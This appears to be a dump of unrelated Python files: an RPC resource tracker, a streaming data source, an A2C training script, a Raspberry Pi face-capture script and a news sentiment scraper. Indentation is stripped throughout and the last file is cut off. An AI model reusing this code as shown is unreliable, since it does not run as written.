            Callback function that receives a resource when it is ready;
            returns True if the resource is consumed.
"""
raise NotImplementedError()
def summary(self):
"""Get summary information of the scheduler."""
raise NotImplementedError()
class PriorityScheduler(Scheduler):
"""Priority based scheduler, FIFO based on time"""
def __init__(self, key):
self._key = key
self._values = []
self._requests = []
def _schedule(self):
while self._requests and self._values:
value = self._values.pop(0)
item = heapq.heappop(self._requests)
callback = item[-1]
if callback(value[1:]):
value[0].pending_matchkeys.remove(value[-1])
else:
self._values.append(value)
def put(self, value):
self._values.append(value)
self._schedule()
def request(self, user, priority, callback):
heapq.heappush(self._requests, (-priority, time.time(), callback))
self._schedule()
def summary(self):
"""Get summary information of the scheduler."""
return {"free": len(self._values),
"pending": len(self._requests)}
class TCPEventHandler(tornado_util.TCPHandler):
"""Base asynchronize message handler.
The tracker and client follows a simple message protocol.
The message is in form [nbytes(int32)] [json-str].
All the information is packed in json-str
"""
def __init__(self, tracker, sock, addr):
super(TCPEventHandler, self).__init__(sock)
self._data = bytearray()
self._tracker = tracker
self._msg_size = 0
self._addr = addr
self._init_req_nbytes = 4
self._info = {"addr": addr}
        # set of pending match keys that have not been used yet.
self.pending_matchkeys = set()
self._tracker._connections.add(self)
def name(self):
"""name of connection"""
return "TCPSocket: %s" % str(self._addr)
def summary(self):
"""Summary of this connection"""
return self._info
def _init_conn(self, message):
"""Initialie the connection"""
if len(message) != 4:
logging.info("Invalid connection from %s", self.name())
self.close()
magic = struct.unpack('@i', message)[0]
if magic != RPC_TRACKER_MAGIC:
logging.info("Invalid magic from %s", self.name())
self.close()
self.write_message(struct.pack('@i', RPC_TRACKER_MAGIC), binary=True)
self._init_req_nbytes = 0
def on_message(self, message):
"""Callback when a message is received.
Parameters
----------
message : bytearray
The bytes received
"""
assert isinstance(message, bytes)
if self._init_req_nbytes:
self._init_conn(message)
return
self._data += message
while True:
if self._msg_size == 0:
if len(self._data) >= 4:
self._msg_size = struct.unpack('@i', self._data[:4])[0]
else:
return
if self._msg_size != 0 and len(self._data) >= self._msg_size + 4:
msg = py_str(bytes(self._data[4:4 + self._msg_size]))
del self._data[:4 + self._msg_size]
self._msg_size = 0
# pylint: disable=broad-except
self.call_handler(json.loads(msg))
else:
return
def ret_value(self, data):
"""return value to the output"""
data = json.dumps(data)
self.write_message(
struct.pack('@i', len(data)), binary=True)
self.write_message(data.encode("utf-8"), binary=True)
def call_handler(self, args):
"""Event handler when json request arrives."""
code = args[0]
if code == TrackerCode.PUT:
key = args[1]
port, matchkey = args[2]
self.pending_matchkeys.add(matchkey)
self._tracker.put(key, (self, self._addr[0], port, matchkey))
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.REQUEST:
key = args[1]
user = args[2]
priority = args[3]
def _cb(value):
# if the connection is already closed
if not self._sock:
return False
try:
self.ret_value([TrackerCode.SUCCESS, value])
except (socket.error, IOError):
return False
return True
self._tracker.request(key, user, priority, _cb)
elif code == TrackerCode.PING:
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.GET_PENDING_MATCHKEYS:
self.ret_value(list(self.pending_matchkeys))
elif code == TrackerCode.STOP:
# safe stop tracker
if self._tracker._stop_key == args[1]:
self.ret_value(TrackerCode.SUCCESS)
self._tracker.stop()
else:
self.ret_value(TrackerCode.FAIL)
elif code == TrackerCode.UPDATE_INFO:
self._info.update(args[1])
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.SUMMARY:
status = self._tracker.summary()
self.ret_value([TrackerCode.SUCCESS, status])
else:
logging.info("Unknown tracker code %d", code)
self.close()
def on_close(self):
self._tracker._connections.remove(self)
def on_error(self, err):
logging.info("%s: Error in RPC Tracker: %s", self.name(), err)
self.close()
class TrackerServerHandler(object):
"""Tracker that tracks the resources."""
def __init__(self, sock, stop_key):
self._scheduler_map = {}
self._sock = sock
self._sock.setblocking(0)
self._ioloop = ioloop.IOLoop.current()
self._stop_key = stop_key
self._connections = set()
def _event_handler(_, events):
self._on_event(events)
self._ioloop.add_handler(
self._sock.fileno(), _event_handler, self._ioloop.READ)
def _on_event(self, _):
while True:
try:
conn, addr = self._sock.accept()
TCPEventHandler(self, conn, addr)
except socket.error as err:
if err.args[0] in (errno.EAGAIN, errno.EWOULDBLOCK):
break
def create_scheduler(self, key):
"""Create a new scheduler."""
return PriorityScheduler(key)
def put(self, key, value):
"""Report a new resource to the tracker."""
if key not in self._scheduler_map:
self._scheduler_map[key] = self.create_scheduler(key)
self._scheduler_map[key].put(value)
def request(self, key, user, priority, callback):
"""Request a new resource."""
if key not in self._scheduler_map:
self._scheduler_map[key] = self.create_scheduler(key)
self._scheduler_map[key].request(user, priority, callback)
def stop(self):
"""Safely stop tracker."""
for conn in list(self._connections):
conn.close()
self._sock.close()
self._ioloop.stop()
def summary(self):
"""Return a dict summarizing current status."""
qinfo = {}
for k, v in self._scheduler_map.items():
qinfo[k] = v.summary()
cinfo = []
# ignore client connections without key
for conn in self._connections:
res = conn.summary()
if res.get("key", "").startswith("server"):
cinfo.append(res)
return {"queue_info": qinfo, "server_info": cinfo}
def run(self):
"""Run the tracker server"""
self._ioloop.start()
def _tracker_server(listen_sock, stop_key):
handler = TrackerServerHandler(listen_sock, stop_key)
handler.run()
logging.info("Tracker Stop signal received, terminating...")
class Tracker(object):
"""Start RPC tracker on a seperate process.
Python implementation based on multi-processing.
Parameters
----------
host : str
The host url of the server.
port : int
        The TCP port to bind to
port_end : int, optional
The end TCP port to search
"""
def __init__(self,
host,
port=9190,
port_end=9199):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = None
self.stop_key = base.random_key("tracker")
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
logging.info("RPCTracker: bind to %s:%d", host, self.port)
sock.listen(1)
self.proc = multiprocessing.Process(
target=_tracker_server, args=(sock, self.stop_key))
self.proc.start()
self.host = host
# close the socket on this process
sock.close()
def _stop_tracker(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
sock.sendall(struct.pack("@i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("@i", base.recvall(sock, 4))[0]
assert magic == base.RPC_TRACKER_MAGIC
base.sendjson(sock, [TrackerCode.STOP, self.stop_key])
assert base.recvjson(sock) == TrackerCode.SUCCESS
sock.close()
def terminate(self):
"""Terminate the server process"""
if self.proc:
if self.proc.is_alive():
self._stop_tracker()
self.proc.join(1)
if self.proc.is_alive():
logging.info("Terminating Tracker Server...")
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
|
generator_data_source.py
|
from skmultiflow.data.source.data_source import DataSource
import threading
class GeneratorDataSource(DataSource):
""" GeneratorDataSource class.
Provides a DataSource implementation, pulling data from a generator.
Examples
--------
>>> import time
>>> from skmultiflow.data.generator.sea_generator import SEAGenerator
>>> from skmultiflow.data.source.generator_data_source import GeneratorDataSource
>>> from skmultiflow.data.observer.buffer_data_event_observer import BufferDataEventObserver
>>>
>>>
>>> def record_to_dictionary(record):
>>> if record is None:
>>> return None
>>> return {'X': record[0], 'y': record[1]}
>>>
>>>
>>> # Setup an event observer and a data source
>>> sea_generator = SEAGenerator(classification_function=2, random_state=112, balance_classes=False, noise_percentage=0.28)
>>> buffer_data_event_observer = BufferDataEventObserver()
>>> data_source = GeneratorDataSource(record_to_dictionary, [buffer_data_event_observer], sea_generator)
>>> data_source.listen_for_events()
>>>
>>> # Wait until first event is received
>>> while(len(buffer_data_event_observer.get_buffer())==0):
>>> time.sleep(0.100) # 100ms
>>>
>>> first_event = buffer_data_event_observer.get_buffer()[0]
>>> print('First event: X: {}, y: {}'.format(first_event['X'], first_event['y']))
"""
def __init__(self, record_to_dictionary, observers, generator):
super().__init__(record_to_dictionary, observers)
self.generator = generator
self.name = "GeneratorDataSource: {}".format(self.generator.name)
    def _prepare_for_use(self):
        """ Prepares the data source to be used
        """
        pass
def listen_for_events(self):
thread = threading.Thread(target=self.consume_generator_messages, args=())
thread.daemon = True
thread.start()
def consume_generator_messages(self):
event = self.generator.next_sample()
while event is not None:
self.on_new_event(event)
event = self.generator.next_sample()
|
naiveA2C.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
# @Time : 2021/8/4 11:02 PM
# @Author : tinyzqh
# @Email : tinyzqh@163.com
# @File : naiveA2C.py
"""
import gym
import argparse
import torch
import numpy as np
import torch.nn as nn
import torch.optim as optim
from torch.distributions import Categorical
import matplotlib.pyplot as plt
from multiprocessing import Process, Pipe
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class VecEnv(object):
"""
An abstract asynchronous, vectorized environment.
# This code is from openai baseline
# https://github.com/openai/baselines/tree/master/baselines/common/vec_env
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
self.step_async(actions)
return self.step_wait()
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
def make_env(args):
def _thunk():
env = gym.make(args.env_name)
return env
return _thunk
class ActorCritic(nn.Module):
def __init__(self, num_inputs, num_outputs, hidden_size, std=0.0):
super(ActorCritic, self).__init__()
self.critic = nn.Sequential(
nn.Linear(num_inputs, hidden_size),
nn.ReLU(),
nn.Linear(hidden_size, 1)
)
self.actor = nn.Sequential(
nn.Linear(num_inputs, hidden_size),
nn.ReLU(),
nn.Linear(hidden_size, num_outputs),
nn.Softmax(dim=1),
)
def forward(self, x):
value = self.critic(x)
probs = self.actor(x)
dist = Categorical(probs)
return dist, value
def test_env(args, vis=False):
env = gym.make(args.env_name) # a single env
state = env.reset()
if vis: env.render()
done = False
total_reward = 0
while not done:
state = torch.FloatTensor(state).unsqueeze(0).to(device)
dist, _ = model(state)
next_state, reward, done, _ = env.step(dist.sample().cpu().numpy()[0])
state = next_state
if vis: env.render()
total_reward += reward
return total_reward
def compute_returns(next_value, rewards, masks, gamma=0.99):
R = next_value
returns = []
for step in reversed(range(len(rewards))):
R = rewards[step] + gamma * R * masks[step]
returns.insert(0, R)
return returns
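# Example (illustrative): rewards=[1, 1, 1], masks=[1, 1, 0], gamma=0.99 and next_value=0
# give returns [1 + 0.99 * 1.99, 1 + 0.99 * 1, 1] = [2.9701, 1.99, 1.0], i.e. the
# discounted return is cut off where an episode ends (mask == 0).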
def plot(epoch, rewards):
plt.plot(rewards, 'b-')
plt.title('frame %s. reward: %s' % (epoch, rewards[-1]))
plt.pause(0.0001)
class Agent(object):
def __init__(self, env, exp_buffer, args):
super(Agent, self).__init__()
def build_model(self):
pass
def learn(self):
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="the parameter of a2c")
    parser.add_argument('--hidden_size', type=int, help="number of hidden units in the actor-critic network", default=256)
parser.add_argument('--lr', type=float, help='learning rate used in the Adam optimizer', default=1e-3)
parser.add_argument('--num_steps', type=int, help="the num of rollout", default=5)
parser.add_argument("--env_name", default="CartPole-v0") # OpenAI gym environment name
parser.add_argument("--num_envs", type=int, default=8) # OpenAI gym environment name
arg = parser.parse_args()
plt.ion()
envs = [make_env(arg) for i in range(arg.num_envs)]
envs = SubprocVecEnv(envs) # 8 env
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = ActorCritic(envs.observation_space.shape[0], envs.action_space.n, arg.hidden_size).to(device)
optimizer = optim.Adam(model.parameters())
test_rewards = []
state = envs.reset()
for epoch in range(20000):
log_probs = []
values = []
rewards = []
masks = []
entropy = 0
for _ in range(arg.num_steps): # rollout trajectory
state = torch.FloatTensor(state).to(device)
dist, value = model(state)
action = dist.sample()
next_state, reward, done, _ = envs.step(action.cpu().numpy())
log_prob = dist.log_prob(action)
entropy += dist.entropy().mean()
log_probs.append(log_prob)
values.append(value)
rewards.append(torch.FloatTensor(reward).unsqueeze(1).to(device))
masks.append(torch.FloatTensor(1 - done).unsqueeze(1).to(device))
state = next_state
if epoch % 100 == 0:
test_rewards.append(np.mean([test_env(args=arg) for _ in range(10)]))
plot(epoch, test_rewards)
next_state = torch.FloatTensor(next_state).to(device)
_, next_value = model(next_state)
returns = compute_returns(next_value, rewards, masks)
log_probs = torch.cat(log_probs)
returns = torch.cat(returns).detach()
values = torch.cat(values)
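        # A2C update: advantage A = R - V(s); the actor maximizes log-prob weighted by the
        # (detached) advantage, the critic regresses V(s) toward the n-step return, and the
        # entropy bonus (weight 0.001) encourages exploration.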
advantage = returns - values
actor_loss = -(log_probs * advantage.detach()).mean()
critic_loss = advantage.pow(2).mean()
loss = actor_loss + 0.5 * critic_loss - 0.001 * entropy
optimizer.zero_grad()
loss.backward()
optimizer.step()
# test_env(True)
|
acquire_faces.py
|
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
import numpy as np
import os
import multiprocessing
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
def detect_faces(image, frames_passed_in_session, output):
    gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # run the Haar cascade on the grayscale frame computed above
    faces = face_cascade.detectMultiScale(gray_image, scaleFactor=1.2, minNeighbors=4, minSize=(60, 60), maxSize=(300, 300))
face_num=0
for (x, y, w, h) in faces:
print("face found!")
face_roi = image[y:y+h, x:x+w]
date_time_face_id = time.strftime('%d-%m-%Y-%H:%M:%S_')
image_filename = date_time_face_id + str(frames_passed_in_session) + "_" + str(face_num) + ".png"
cv2.imwrite(image_filename, face_roi)
face_num += 1
output.put(None)
def main():
camera = PiCamera()
resolution = ((1280, 720)) #(640, 480) (1920, 1080)
fps = 10
camera.resolution = resolution
camera.framerate = fps
rawCapture = PiRGBArray(camera, size=resolution)
time.sleep(0.1)
background_image = None
frames_passed_in_session = 0
num_frames_set_bg = 25
images_from_segment = []
output = multiprocessing.Queue()
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
image = frame.array
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
smooth_gray_image = cv2.GaussianBlur(gray_image, (3, 3), 0)
float_smooth_gray_image = np.float32(smooth_gray_image)
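        # Motion detection via a running-average background model: accumulateWeighted blends
        # each new frame into the background estimate, and absdiff against that estimate
        # highlights the pixels that changed.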
if frames_passed_in_session == 0:
background_image = float_smooth_gray_image
else:
cv2.accumulateWeighted(float_smooth_gray_image, background_image, 0.1)
background_difference = cv2.absdiff(float_smooth_gray_image, background_image)
mask_difference = cv2.bitwise_and(background_difference, background_image)
abs_mask_difference = np.uint8(mask_difference)
frames_passed_in_session += 1
if frames_passed_in_session > num_frames_set_bg: # time delay for bg to average
ret, thresh = cv2.threshold(abs_mask_difference, 50, 255, cv2.THRESH_BINARY)
num_pixels_different = np.sum(thresh)
print (num_pixels_different)
if num_pixels_different > 10000:
#os.system("espeak 'Movement Detected!'")
images_from_segment.append((frames_passed_in_session, image))
else:
print (frames_passed_in_session)
if frames_passed_in_session > num_frames_set_bg and frames_passed_in_session % fps == 0:
print('working')
processes = [multiprocessing.Process(target=detect_faces, args=(each_image, i, output)) for i, each_image in images_from_segment]
for p in processes:
p.start()
for p in processes:
p.join()
results = [output.get() for p in processes]
images_from_segment = []
#cv2.imshow("Frame", abs_mask_difference)
#key = cv2.waitKey(1) & 0xFF
rawCapture.truncate(0)
#if key == ord("q"):
#break
if __name__ == "__main__":
main()
|
function.py
|
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['CUDA_VISIBLE_DEVICES'] = ''
import nltk
nltk.data.path.append('/home/husein/nltk_data')
from rnn import *
from setting import *
from bs4 import BeautifulSoup
import requests
import re
from queue import Queue
import threading
import pickle
import numpy as np
import spacy
import pandas as pd
from unidecode import unidecode
import itertools
from fake_useragent import UserAgent
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from datetime import datetime, timedelta
from dateutil import parser
from newspaper import Article
import networkx as nx
import networkx.drawing.layout as nxlayout
import plotly.graph_objs as go
from sklearn.feature_extraction.text import TfidfVectorizer
english_stopwords = stopwords.words('english')
nlp = spacy.load('en_core_web_md')
GOOGLE_NEWS_URL = 'https://www.google.com.my/search?q={}&source=lnt&tbm=nws&start={}'
def forge_url(q, start):
return GOOGLE_NEWS_URL.format(q.replace(' ', '+'), start)
ua = UserAgent()
hdr = {'User-Agent': ua.chrome}
def getsentiment(sentences):
batch_x = np.zeros((len(sentences), SENTIMENT_LEN, DIMENSION))
for i, sentence in enumerate(sentences):
tokens = sentence.split()[:SENTIMENT_LEN]
for no, text in enumerate(tokens[::-1]):
try:
batch_x[i, -1 - no, :] += sentiment_vector[sentiment_dict[text], :]
except:
continue
return sentiment_sess.run(tf.nn.softmax(sentiment_model.logits), feed_dict = {sentiment_model.X : batch_x})
def getemotion(sentences):
batch_x = np.zeros((len(sentences), EMOTION_LEN, DIMENSION))
for i, sentence in enumerate(sentences):
tokens = sentence.split()[:EMOTION_LEN]
for no, text in enumerate(tokens[::-1]):
try:
batch_x[i, -1 - no, :] += emotion_vector[emotion_dict[text], :]
except:
continue
return emotion_sess.run(tf.nn.softmax(emotion_model.logits), feed_dict = {emotion_model.X : batch_x})
def getmsg(sentences):
batch_x = np.zeros((len(sentences), MESSAGE_LEN, DIMENSION))
for i, sentence in enumerate(sentences):
tokens = sentence.split()[:MESSAGE_LEN]
for no, text in enumerate(tokens[::-1]):
try:
batch_x[i, -1 - no, :] += message_vector[message_dict[text], :]
except:
continue
return message_sess.run(tf.nn.softmax(message_model.logits), feed_dict = {message_model.X : batch_x})
def getpolar(sentences):
batch_polarity = np.zeros((len(sentences), POLARITY_LEN, DIMENSION))
batch_subjectivity = np.zeros((len(sentences), SUBJECTIVITY_LEN, DIMENSION))
batch_irony = np.zeros((len(sentences), IRONY_LEN, DIMENSION))
batch_bias = np.zeros((len(sentences), BIAS_LEN, DIMENSION))
for i, sentence in enumerate(sentences):
tokens = sentence.split()[:BIAS_LEN]
for no, text in enumerate(tokens[::-1]):
try:
batch_polarity[i, -1 - no, :] += polarity_vector[polarity_dict[text], :]
except:
pass
try:
batch_subjectivity[i, -1 - no, :] += subjectivity_vector[subjectivity_dict[text], :]
except:
pass
try:
batch_irony[i, -1 - no, :] += irony_vector[irony_dict[text], :]
except:
pass
try:
batch_bias[i, -1 - no, :] += bias_vector[bias_dict[text], :]
except:
pass
output_subjectivity = subjectivity_sess.run(tf.nn.softmax(subjectivity_model.logits), feed_dict = {subjectivity_model.X : batch_subjectivity})
output_polarity = polarity_sess.run(tf.nn.softmax(polarity_model.logits), feed_dict = {polarity_model.X : batch_polarity})
output_irony = irony_sess.run(tf.nn.softmax(irony_model.logits), feed_dict = {irony_model.X : batch_irony})
output_bias = bias_sess.run(tf.nn.softmax(bias_model.logits), feed_dict = {bias_model.X : batch_bias})
argmax_subjectivity = np.argmax(output_subjectivity, axis = 1)
argmax_subjectivity[np.where(argmax_subjectivity == 0)[0]] = -1
argmax_polarity = np.argmax(output_polarity, axis = 1)
argmax_polarity[np.where(argmax_polarity == 0)[0]] = -1
argmax_irony = np.argmax(output_irony, axis = 1)
argmax_irony[np.where(argmax_irony == 0)[0]] = -1
argmax_bias = np.argmax(output_bias, axis = 1)
argmax_bias[np.where(argmax_bias == 0)[0]] = -1
return ((np.max(output_subjectivity, axis = 1) - 0.5) / 0.5) * argmax_subjectivity,((np.max(output_polarity, axis = 1) - 0.5) / 0.5) * argmax_polarity,((np.max(output_irony, axis = 1) - 0.5) / 0.5) * argmax_irony,((np.max(output_bias, axis = 1) - 0.5) / 0.5) * argmax_bias
def run_parallel_in_threads(target, args_list):
globalparas = []
result = Queue()
def task_wrapper(*args):
result.put(target(*args))
threads = [threading.Thread(target = task_wrapper, args = args) for args in args_list]
for t in threads:
t.start()
for t in threads:
t.join()
while not result.empty():
globalparas.append(result.get())
globalparas = list(filter(None, globalparas))
return globalparas
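# Example (illustrative): run_parallel_in_threads(lambda x: x * x, [(2,), (3,)]) runs each
# call in its own thread and returns [4, 9] in completion order (falsy results are dropped
# by the filter(None, ...) above).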
def textcleaning(string):
string = unidecode(string)
string = re.sub('[^\'\"A-Za-z0-9\- ]+', '', string)
string = word_tokenize(string)
string = filter(None, string)
string = [y.strip() for y in string]
string = ' '.join(string)
return string
def classifiercleaning(string):
string = unidecode(string)
string = re.sub('[^A-Za-z ]+', '', string)
string = word_tokenize(string)
string = filter(None, string)
string = [y.strip() for y in string]
string = [y for y in string if len(y) > 2 and y.find('nbsp') < 0 and y.find('href') < 0 and y not in english_stopwords]
string = ' '.join(string).lower()
return ''.join(''.join(s)[:2] for _, s in itertools.groupby(string))
def extract_links(content):
soup = BeautifulSoup(content, 'html.parser')
today = datetime.now().strftime("%m/%d/%Y")
links_list = [v.attrs['href'] for v in soup.find_all('a', {'class': ['lLrAF']})]
dates_list = [v.text for v in soup.find_all('div', {'class': ['slp']})]
output = []
for (link, date) in zip(links_list, dates_list):
date = date.split('-')
if date[1].find('hours') > 0 or date[1].find('minute') > 0:
date[1] = today
        elif date[1].find('day') > 0:
            # "N days ago": convert to an absolute date by subtracting N days from today
            count = int(date[1].split()[0])
            date[1] = (datetime.now() - timedelta(days=count)).strftime("%m-%d-%Y")
else:
try:
date[1] = parser.parse(date[1]).strftime("%m-%d-%Y")
except:
date[1] = 'null'
output.append((link, date[0].strip(), date[1],))
return output
def getlink(value, token = 'free'):
url = forge_url(value, 0)
response = requests.get(url, headers=hdr, timeout=20)
links = extract_links(response.content)
if token == 'free':
return links[:5]
else:
return links
def getP(link, news, date):
article = Article(link)
article.download()
article.parse()
soup = BeautifulSoup(article.html, 'html.parser')
articles = [v.text for v in soup.find_all('p')]
paras, paras_classifier = [], []
for p in articles:
if len(p.split()) > 10:
paras.append(textcleaning(p))
paras_classifier.append(classifiercleaning(p))
return {'url': link,'p': paras,'p-classifier':paras_classifier,'news':news, 'date':date,'title':article.title}
def filterP(links):
outputs = run_parallel_in_threads(getP, links)
overall_emotion, overall_sentiment, overall_subj, overall_pol, overall_irony, overall_msg, overall_bias = [], [], [], [], [], [], []
overall_local_entities_nouns = []
persons, orgs, gpes = [], [], []
df_texts, df_sentiments = [], []
for i in range(len(outputs)):
local_entities_nouns, local_persons, local_orgs, local_gpes = [], [], [], []
for sentence in outputs[i]['p']:
for token in nlp(sentence):
if token.ent_type_ == 'PERSON':
local_persons.append(str(token))
if token.ent_type_ == 'ORG':
local_orgs.append(str(token))
if token.ent_type_ == 'GPE':
local_gpes.append(str(token))
if (len(token.ent_type_) > 0 or token.tag_ in ['NNP','NN']) and str(token).lower() not in english_stopwords:
local_entities_nouns.append(str(token))
sentiments = getsentiment(outputs[i]['p-classifier'])
df_sentiments += np.argmax(sentiments,axis=1).tolist()
df_texts += outputs[i]['p-classifier']
emotions = getemotion(outputs[i]['p-classifier'])
msgs = getmsg(outputs[i]['p-classifier'])
subjectivities, polarities, ironies, biases = getpolar(outputs[i]['p-classifier'])
overall_local_entities_nouns += local_entities_nouns
persons += local_persons
orgs += local_orgs
gpes += local_gpes
local_entities_nouns_unique, local_entities_nouns_count = np.unique(local_entities_nouns,return_counts=True)
sorted_val = local_entities_nouns_unique[np.argsort(local_entities_nouns_count)[::-1]].tolist()
outputs[i]['tokens'] = sorted_val[:15]
outputs[i]['sentiment'] = sentiments.tolist()
outputs[i]['emotion'] = emotions.tolist()
outputs[i]['msg'] = msgs.tolist()
outputs[i]['subjectivity'] = subjectivities.tolist()
outputs[i]['polarity'] = polarities.tolist()
outputs[i]['irony'] = ironies.tolist()
outputs[i]['bias'] = biases.tolist()
outputs[i]['person'] = list(set(local_persons))
outputs[i]['org'] = list(set(local_orgs))
outputs[i]['gpes'] = list(set(local_gpes))
avg_sentiment = sentiments.mean(axis = 0)
avg_emotion = emotions.mean(axis = 0)
avg_msg = msgs.mean(axis = 0)
avg_subjectivity = subjectivities.mean()
avg_polarity = polarities.mean()
avg_irony = ironies.mean()
avg_bias = biases.mean()
overall_emotion.append(avg_emotion)
overall_sentiment.append(avg_sentiment)
overall_msg.append(avg_msg)
overall_subj.append(avg_subjectivity)
overall_pol.append(avg_polarity)
overall_irony.append(avg_irony)
overall_bias.append(avg_bias)
outputs[i]['avg_sentiment'] = avg_sentiment.tolist()
outputs[i]['avg_emotion'] = avg_emotion.tolist()
outputs[i]['avg_msg'] = avg_msg.tolist()
outputs[i]['avg_subjectivity'] = avg_subjectivity.tolist()
outputs[i]['avg_polarity'] = avg_polarity.tolist()
outputs[i]['avg_irony'] = avg_irony.tolist()
outputs[i]['avg_bias'] = avg_bias.tolist()
# graph pipeline
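    # With norm='l2' TF-IDF vectors, DxT . DxT^T is the cosine similarity between every pair
    # of paragraphs; each paragraph becomes a node (colored by its sentiment), pairs whose
    # similarity clears the cutoff become weighted edges, and the graph is laid out with
    # the Fruchterman-Reingold algorithm.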
df = pd.DataFrame({'text':df_texts,'sentiment':df_sentiments})
df['id'] = df.index
tfidf = TfidfVectorizer(stop_words='english',norm='l2')
DxT = tfidf.fit_transform(df['text'])
DxD = np.dot(DxT,DxT.T)
G = nx.Graph()
for i in range(df.shape[0]):
idx = df.at[i,'id']
text = df.at[i,'text']
sentiment = df.at[i,'sentiment']
G.add_node(idx,text=text,sentiment=sentiment)
dense_DxD = DxD.toarray()
len_dense = len(dense_DxD)
cutoff=0
for i in range(len_dense):
for j in range(i+1,len_dense):
if dense_DxD[i,j]>=cutoff:
weight=dense_DxD[i,j]
G.add_edge(df.at[i,'id'],df.at[j,'id'],weight=weight)
for node,degree in list(dict(G.degree()).items()):
if degree == 0:
G.remove_node(node)
pos = nxlayout.fruchterman_reingold_layout(G,k=1.5/np.sqrt(len(G.nodes())))
edge_data = []
colors = {0:'1',1:'2'}
for u,v,w in G.edges(data=True):
x0,y0 = pos[u]
x1,y1 = pos[v]
w = w['weight']
edge_data.append(go.Scatter(x=[x0,x1,None],
y=[y0,y1,None],
line=go.Line(width=3.0*w,color='#888'),
hoverinfo='none',
mode='lines'))
node_data = go.Scatter(
x=[],
y=[],
text=[],
mode='markers',
hoverinfo='text',
marker=go.Marker(
showscale=True,
reversescale=True,
color=[],
size=5.0,
colorbar=dict(
thickness=15,
xanchor='left',
tickmode='array',
tickvals=[1,2],
ticktext=['negative','positive'],
ticks = 'outside'
),
line=dict(width=0.5)))
for u,w in G.nodes(data=True):
x,y = pos[u]
color = colors[w['sentiment']]
text = w['text']
node_data['x'].append(x)
node_data['y'].append(y)
node_data['text'].append(text)
node_data['marker']['color'].append(color)
# end graph pipeline
overall_unique, overall_count = np.unique(overall_local_entities_nouns, return_counts = True)
overall_unique = overall_unique[np.argsort(overall_count)[::-1]][:200].tolist()
overall_count = overall_count[np.argsort(overall_count)[::-1]][:200].tolist()
return {'overall_sentiment': np.array(overall_sentiment).mean(axis = 0).tolist(),
'overall_emotion': np.array(overall_emotion).mean(axis = 0).tolist(),
'overall_msg': np.array(overall_msg).mean(axis = 0).tolist(),
'overall_subjectivity': np.array(overall_subj).mean().tolist(),
'overall_polarity': np.array(overall_pol).mean().tolist(),
'overall_irony': np.array(overall_irony).mean().tolist(),
'overall_bias': np.array(overall_bias).mean().tolist(),
